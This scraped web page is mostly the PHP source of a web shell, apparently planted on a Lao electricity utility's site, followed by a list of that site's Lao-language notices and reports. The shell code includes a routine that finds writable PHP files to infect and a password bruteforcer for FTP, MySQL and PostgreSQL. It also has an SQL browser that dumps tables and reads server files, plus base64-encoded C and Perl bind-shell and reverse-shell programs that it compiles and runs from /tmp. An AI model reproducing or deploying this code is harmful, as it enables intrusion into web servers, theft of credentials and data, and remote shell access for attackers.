<style>html{height:100%}html body{width:100%;height:100%;margin:0;font-family:Nunito, sans-serif;}.container{display:block;position:relative;width:100%;height:100%;background:linear-gradient(to bottom,#020107 0,#201b46 100%)}.container .text{color:#fff;position:absolute;top:50%;right:50%;margin:-10px -75px 0 0;font-size:20px;font-family:Nunito, sans-serif;font-weight:700}.shooting-stars{z-index:10;width:5px;height:85px;border-top-left-radius:50%;border-top-right-radius:50%;position:absolute;bottom:0;right:0;background:linear-gradient(to top,rgba(255,255,255,0),#fff);animation:animShootingStar 10s linear infinite}@keyframes animStar{from{transform:translateY(0)}to{transform:translateY(-2560px) translateX(-2560px)}}@keyframes animShootingStar{from{transform:translateY(0) translateX(0) rotate(-45deg);opacity:1;height:5px}to{transform:translateY(-2560px) translateX(-2560px) rotate(-45deg);opacity:1;height:800px}}</style>
<footer id='det' style='position:fixed; left:0px; right:0px; bottom:0px; background:rgb(0,0,0); text-align:center; border-top: 1px solid #ff007e; border-bottom: 1px solid #ff007e'><font face='Century Gothic' color='#ff0048' size='5'><font style='font-size: 10pt' face='Century Gothic'><font face='Tahoma' color='#005aff' size='2.5'><font color='#ff007e'><b> ©opy®ight : </b></font>
<marquee scrollamount='3' scrolldelay='60' width='80%'><b>Twepl & <a href='https://github.com/mIcHyAmRaNe'>mIcHy</a> </b></marquee>  </font></font></font></footer>");
}
function actionSelfRemove() {
    if($_POST['p1'] == 'yes')
        if(@unlink(preg_replace('!(d+)s.*!', '', __FILE__)))
            die('Shell has been removed');
        else
            echo 'unlink error!';
    if($_POST['p1'] != 'yes')
        hardHeader();
    echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,'yes')">Yes</a></div>';
    hardFooter();
}
function actionInfect() {
    hardHeader();
    echo '<h1>Infect</h1><div class=content>';
    if($_POST['p1'] == 'infect') {
        $target=$_SERVER['DOCUMENT_ROOT'];
            function ListFiles($dir) {
                if($dh = opendir($dir)) {
                    $files = Array();
                    $inner_files = Array();
                    while($file = readdir($dh)) {
                        if($file != "." && $file != "..") {
                            if(is_dir($dir . "/" . $file)) {
                                $inner_files = ListFiles($dir . "/" . $file);
                                if(is_array($inner_files)) $files = array_merge($files, $inner_files);
                            } else {
                                array_push($files, $dir . "/" . $file);
                            }
                        }
                    }
                    closedir($dh);
                    return $files;
                }
            }
            foreach (ListFiles($target) as $key=>$file){
                $nFile = substr($file, -4, 4);
                if($nFile == ".php" ){
                    if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){
                        echo "$file<br>";
                        $i++;
                    }
                }
            }
            echo "<font color=#a10705 size=14>$i</font>";
        }else{
            echo "<form method=post><input type=submit value=Infect name=infet></form>";
            echo 'Really want to infect the server?&nbsp;<a href=# onclick="g(null,null,'infect')">Yes</a></div>';
        }
    hardFooter();
}
function actionBruteforce() {
    hardHeader();
    if( isset($_POST['proto']) ) {
        echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
        if( $_POST['proto'] == 'ftp' ) {
            function bruteForce($ip,$port,$login,$pass) {
                $fp = @ftp_connect($ip, $port?$port:21);
                if(!$fp) return false;
                $res = @ftp_login($fp, $login, $pass);
                @ftp_close($fp);
                return $res;
            }
        } elseif( $_POST['proto'] == 'mysql' ) {
            function bruteForce($ip,$port,$login,$pass) {
                $res = @mysql_connect($ip.':'.($port?$port:3306), $login, $pass);
                @mysql_close($res);
                return $res;
            }
        } elseif( $_POST['proto'] == 'pgsql' ) {
            function bruteForce($ip,$port,$login,$pass) {
                $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
                $res = @pg_connect($str);
                @pg_close($res);
                return $res;
            }
        }
        $success = 0;
        $attempts = 0;
        $server = explode(":", $_POST['server']);
        if($_POST['type'] == 1) {
            $temp = @file('/etc/passwd');
            if( is_array($temp) )
                foreach($temp as $line) {
                    $line = explode(":", $line);
                    ++$attempts;
                    if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
                        $success++;
                        echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
                    }
                    if(@$_POST['reverse']) {
                        $tmp = "";
                        for($i=strlen($line[0])-1; $i>=0; --$i)
                            $tmp .= $line[0][$i];
                        ++$attempts;
                        if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
                            $success++;
                            echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
                        }
                    }
                }
        } elseif($_POST['type'] == 2) {
            $temp = @file($_POST['dict']);
            if( is_array($temp) )
                foreach($temp as $line) {
                    $line = trim($line);
                    ++$attempts;
                    if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
                        $success++;
                        echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
                    }
                }
        }
        echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
    }
    echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
        .'<td><label><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></label></td></tr><tr><td>'
        .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
        .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
        .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
        .'<input type=hidden name=ne  value="">'
        .'<span>Server:port</span></td>'
        .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
        .'<tr><td><span>Brute type</span></td>'
        .'<td><input type=radio name=type value="1" checked> /etc/passwd</td></tr>'
        .'<tr><td></td><td style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</td></tr>'
        .'<tr><td></td><td><input type=radio name=type value="2"> Dictionary</td></tr>'
        .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
        .'<td><input type=text name=login value="root"></td></tr>'
        .'<tr><td><span>Dictionary</span></td>'
        .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
        .'</td></tr><tr><td></td><td><input type=submit value="submit"></td></tr></form></table>';
    echo '</div>';
    hardFooter();
}
function actionSql() {
    class DbClass {
        var $type;
        var $link;
        var $res;
        function __construct($type)    {
            $this->type = $type;
        }
        function connect($host, $user, $pass, $dbname){
            switch($this->type)    {
                case 'mysql':
                    if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
                    break;
                case 'pgsql':
                    $host = explode(':', $host);
                    if(!$host[1]) $host[1]=5432;
                    if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
                    break;
            }
            return false;
        }
        function selectdb($db) {
            switch($this->type)    {
                case 'mysql':
                    if (@mysql_select_db($db))return true;
                    break;
            }
            return false;
        }
        function query($str) {
            switch($this->type) {
                case 'mysql':
                    return $this->res = @mysql_query($str);
                    break;
                case 'pgsql':
                    return $this->res = @pg_query($this->link,$str);
                    break;
            }
            return false;
        }
        function fetch() {
            $res = func_num_args()?func_get_arg(0):$this->res;
            switch($this->type)    {
                case 'mysql':
                    return @mysql_fetch_assoc($res);
                    break;
                case 'pgsql':
                    return @pg_fetch_assoc($res);
                    break;
            }
            return false;
        }
        function listDbs() {
            switch($this->type)    {
                case 'mysql':
                        return $this->query("SHOW databases");
                break;
                case 'pgsql':
                    return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
                break;
            }
            return false;
        }
        function listTables() {
            switch($this->type)    {
                case 'mysql':
                    return $this->res = $this->query('SHOW TABLES');
                break;
                case 'pgsql':
                    return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
                break;
            }
            return false;
        }
        function error() {
            switch($this->type)    {
                case 'mysql':
                    return @mysql_error();
                break;
                case 'pgsql':
                    return @pg_last_error();
                break;
            }
            return false;
        }
        function setCharset($str) {
            switch($this->type)    {
                case 'mysql':
                    if(function_exists('mysql_set_charset'))
                        return @mysql_set_charset($str, $this->link);
                    else
                        $this->query('SET CHARSET '.$str);
                    break;
                case 'pgsql':
                    return @pg_set_client_encoding($this->link, $str);
                    break;
            }
            return false;
        }
        function loadFile($str) {
            switch($this->type)    {
                case 'mysql':
                    return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
                break;
                case 'pgsql':
                    $this->query("CREATE TABLE hard2(file text);COPY hard2 FROM '".addslashes($str)."';select file from hard2;");
                    $r=array();
                    while($i=$this->fetch())
                        $r[] = $i['file'];
                    $this->query('drop table hard2');
                    return array('file'=>implode(" ",$r));
                break;
            }
            return false;
        }
        function dump($table, $fp = false) {
            switch($this->type)    {
                case 'mysql':
                    $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
                    $create = mysql_fetch_array($res);
                    $sql = $create[1]."; ";
                    if($fp) fwrite($fp, $sql); else echo($sql);
                    $this->query('SELECT * FROM `'.$table.'`');
                    $i = 0;
                    $head = true;
                    while($▟ = $this->fetch()) {
                        $sql = '';
                        if($i % 1000 == 0) {
                            $head = true;
                            $sql = "; ";
                        }
                        $columns = array();
                        foreach($▟ as $k=>$v) {
                            if($v === null)
                                $▟[$k] = "NULL";
                            elseif(is_int($v))
                                $▟[$k] = $v;
                            else
                                $▟[$k] = "'".@mysql_real_escape_string($v)."'";
                            $columns[] = "`".$k."`";
                        }
                        if($head) {
                            $sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES (".implode(", ", $▟).')';
                            $head = false;
                        } else
                            $sql .= " ,(".implode(", ", $▟).')';
                        if($fp) fwrite($fp, $sql); else echo($sql);
                        $i++;
                    }
                    if(!$head)
                        if($fp) fwrite($fp, "; "); else echo("; ");
                break;
                case 'pgsql':
                    $this->query('SELECT * FROM '.$table);
                    while($▟ = $this->fetch()) {
                        $columns = array();
                        foreach($▟ as $k=>$v) {
                            $▟[$k] = "'".addslashes($v)."'";
                            $columns[] = $k;
                        }
                        $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $▟).');'." ";
                        if($fp) fwrite($fp, $sql); else echo($sql);
                    }
                break;
            }
            return false;
        }
    };
    $db = new DbClass($_POST['type']);
    if((@$_POST['p2']=='download') && (@$_POST['p1']!='select')) {
        $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
        $db->selectdb($_POST['sql_base']);
        switch($_POST['charset']) {
            case "Windows-1251": $db->setCharset('cp1251'); break;
            case "UTF-8": $db->setCharset('utf8'); break;
            case "KOI8-R": $db->setCharset('koi8r'); break;
            case "KOI8-U": $db->setCharset('koi8u'); break;
            case "cp866": $db->setCharset('cp866'); break;
        }
        if(empty($_POST['file'])) {
            ob_start("ob_gzhandler", 4096);
            header("Content-Disposition: attachment; filename=dump.sql");
            header("Content-Type: text/plain");
            foreach($_POST['tbl'] as $v)
                $db->dump($v);
            exit;
        } elseif($fp = @fopen($_POST['file'], 'w')) {
            foreach($_POST['tbl'] as $v)
                $db->dump($v, $fp);
            fclose($fp);
            unset($_POST['p2']);
        } else
            die('<script>alert("Error! Can't open file");window.history.back(-1)</script>');
    }
    hardHeader();
    echo "
<h1>Sql browser</h1><div class=content>
<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
<input type=hidden name=ne value=''><input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
<td><label><select name='type'><option value='mysql' ";
    if(@$_POST['type']=='mysql')echo 'selected';
echo ">MySql</option><option value='pgsql' ";
if(@$_POST['type']=='pgsql')echo 'selected';
echo ">PostgreSql</option></select></label></td>
<td><input type=text name=sql_host value="". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) .""></td>
<td><input type=text name=sql_login value="". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) .""></td>
<td><input type=text name=sql_pass value="". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."" required></td><td>";
    $tmp = "<input type=text name=sql_base value=''>";
    if(isset($_POST['sql_host'])){
        if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
            switch($_POST['charset']) {
                case "Windows-1251": $db->setCharset('cp1251'); break;
                case "UTF-8": $db->setCharset('utf8'); break;
                case "KOI8-R": $db->setCharset('koi8r'); break;
                case "KOI8-U": $db->setCharset('koi8u'); break;
                case "cp866": $db->setCharset('cp866'); break;
            }
            $db->listDbs();
            echo "<label><select name=sql_base><option value=''></option>";
            while($▟ = $db->fetch()) {
                list($key, $value) = each($▟);
                echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
            }
            echo '</select></label>';
        }
        else echo $tmp;
    }else
        echo $tmp;
    echo "</td>
                <td><input type=submit value='submit' onclick='fs(d.sf);'></td>
                <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td>
            </tr>
        </table>
        <script>
            s_db='".@addslashes($_POST['sql_base'])."';
            function fs(f) {
                if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
                    if(f.p1) f.p1.value='';
                    if(f.p2) f.p2.value='';
                    if(f.p3) f.p3.value='';
                }
            }
            function st(t,l) {
                d.sf.p1.value = 'select';
                d.sf.p2.value = t;
                if(l && d.sf.p3) d.sf.p3.value = l;
                d.sf.submit();
            }
            function is() {
                for(i=0;i<d.sf.elements['tbl[]'].length;++i)
                    d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
            }
        </script>";
    if(isset($db) && $db->link){
        echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
            if(!empty($_POST['sql_base'])){
                $db->selectdb($_POST['sql_base']);
                echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
                $tbls_res = $db->listTables();
                while($▟ = $db->fetch($tbls_res)) {
                    list($key, $value) = each($▟);
                    if(!empty($_POST['sql_count']))
                        $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
                    $value = htmlspecialchars($value);
                    echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick="st('".$value."',1)">".$value."</a>" . (empty($_POST['sql_count'])?'&nbsp;':" <small>({$n['n']})</small>") . "</nobr><br>";
                }
                echo "<input type='checkbox' onclick='is();'> <input type=submit value='Dump' onclick='document.sf.p2.value="download";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
                if(@$_POST['p1'] == 'select') {
                    $_POST['p1'] = 'query';
                    $_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
                    $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
                    $num = $db->fetch();
                    $pages = ceil($num['n'] / 30);
                    echo "<script>d.sf.onsubmit=function(){st("" . $_POST['p2'] . "", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";
                    echo " of $pages";
                    if($_POST['p3'] > 1)
                        echo " <a href=# onclick='st("" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>&lt; Prev</a>";
                    if($_POST['p3'] < $pages)
                        echo " <a href=# onclick='st("" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next &gt;</a>";
                    $_POST['p3']--;
                    if($_POST['type']=='pgsql')
                        $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
                    else
                        $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
                    echo "<br><br>";
                }
                if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
                    $db->query(@$_POST['p2']);
                    if($db->res !== false) {
                        $title = false;
                        echo '<table width=100% cellspacing=1 cellpadding=2 class=main>';
                        $line = 1;
                        while($▟ = $db->fetch())    {
                            if(!$title)    {
                                echo '<tr>';
                                foreach($▟ as $key => $value)
                                    echo '<th>'.$key.'</th>';
                                reset($▟);
                                $title=true;
                                echo '</tr><tr>';
                                $line = 2;
                            }
                            echo '<tr class="l'.$line.'">';
                            $line = $line==1?2:1;
                            foreach($▟ as $key => $value) {
                                if($value == null)
                                    echo '<td><i>null</i></td>';
                                else
                                    echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
                            }
                            echo '</tr>';
                        }
                        echo '</table>';
                    } else {
                        echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
                    }
                }
                echo "<br></form><form onsubmit='d.sf.p1.value="query";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
                if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile'))
                    echo htmlspecialchars($_POST['p2']);
                echo "</textarea><br/><input type=submit value='Execute'>";
                echo "</td></tr>";
            }
            echo "</table></form><br/>";
            if($_POST['type']=='mysql') {
                $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
                if($db->fetch())
                    echo "<form onsubmit='d.sf.p1.value="loadfile";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='submit'></form>";
            }
            if(@$_POST['p1'] == 'loadfile') {
                $file = $db->loadFile($_POST['p2']);
                echo '<br/><pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
            }
    } else {
        echo htmlspecialchars($db->error());
    }
    echo '</div>';
    hardFooter();
}
function actionNetwork() {
    hardHeader();
    $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
    $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
    $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
    $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
    echo "<h1>Network tools</h1><div class=content>
    <form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'>
    <span>Bind port to /bin/sh</span><br/>
    Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass'> Using: <label><select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select></label> <input type=submit value='submit'>
    </form>
    <form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'>
    <span>Back-connect to</span><br/>
    Server: <input type='text' name='server' value=". $_SERVER['REMOTE_ADDR'] ."> Port: <input type='text' name='port' value='31337'> Using: <label><select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select></label> <input type=submit value='submit'>
    </form><br>";
    if(isset($_POST['p1'])) {
        function cf($f,$t) {
            $w=@fopen($f,"w") or @function_exists('file_put_contents');
            if($w)    {
                @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
                @fclose($w);
            }
        }
        if($_POST['p1'] == 'bpc') {
            cf("/tmp/bp.c",$bind_port_c);
            $▖ = ex("gcc -o /tmp/bp /tmp/bp.c");
            @unlink("/tmp/bp.c");
            $▖ .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
            echo "<pre class=ml1>$▖".ex("ps aux | grep bp")."</pre>";
        }
        if($_POST['p1'] == 'bpp') {
            cf("/tmp/bp.pl",$bind_port_p);
            $▖ = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
            echo "<pre class=ml1>$▖".ex("ps aux | grep bp.pl")."</pre>";
        }
        if($_POST['p1'] == 'bcc') {
            cf("/tmp/bc.c",$back_connect_c);
            $▖ = ex("gcc -o /tmp/bc /tmp/bc.c");
            @unlink("/tmp/bc.c");
            $▖ .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
            echo "<pre class=ml1>$▖".ex("ps aux | grep bc")."</pre>";
        }
        if($_POST['p1'] == 'bcp') {
            cf("/tmp/bc.pl",$back_connect_p);
            $▖ = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
            echo "<pre class=ml1>$▖".ex("ps aux | grep bc.pl")."</pre>";
        }
    }
    echo '</div>';
    hardFooter();
}
if( empty($_POST['a']) )
    if(isset($▚) && function_exists('action' . $▚))
        $_POST['a'] = $▚;
    else
        $_POST['a'] = 'FilesMan';
if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
    call_user_func('action' . $_POST['a']);
?>

ແຈ້ງການ

17-02-2022

w


ການຈັດຕັ້ງປະຕິບັດລາຄາໄຟຟ້າປັບປຸງໃໝ່ ປີ 2021

28-06-2021


ຂ່າວເດັ່ນ ປະຈຳປີ 2020

30-12-2020


ສະຖີຕິໄຟຟ້າລາວ ປີ 2019

29-10-2020


ບົດລາຍງານ ປະຈຳປີ 2018

29-10-2020


ຂ່າວເດັ່ນ ປະຈຳເດືອນ 09

07-10-2020


ເອກະສານ ການສຶກສາໂຄງສ້າງ ລາຄາໄຟຟ້າ ປີ 2021-2025

30-09-2020


ສະຖິຕິໄຟຟ້າລາວປີ 2017

30-08-2018


ບົດລາຍງານປະຈຳປີ 2016

11-07-2018


ຮູບແບບເອກະສານບໍລິຫານທົ່ວໄປຂອງລັດວິສາຫະກິດໄຟຟ້າລາວ

21-06-2018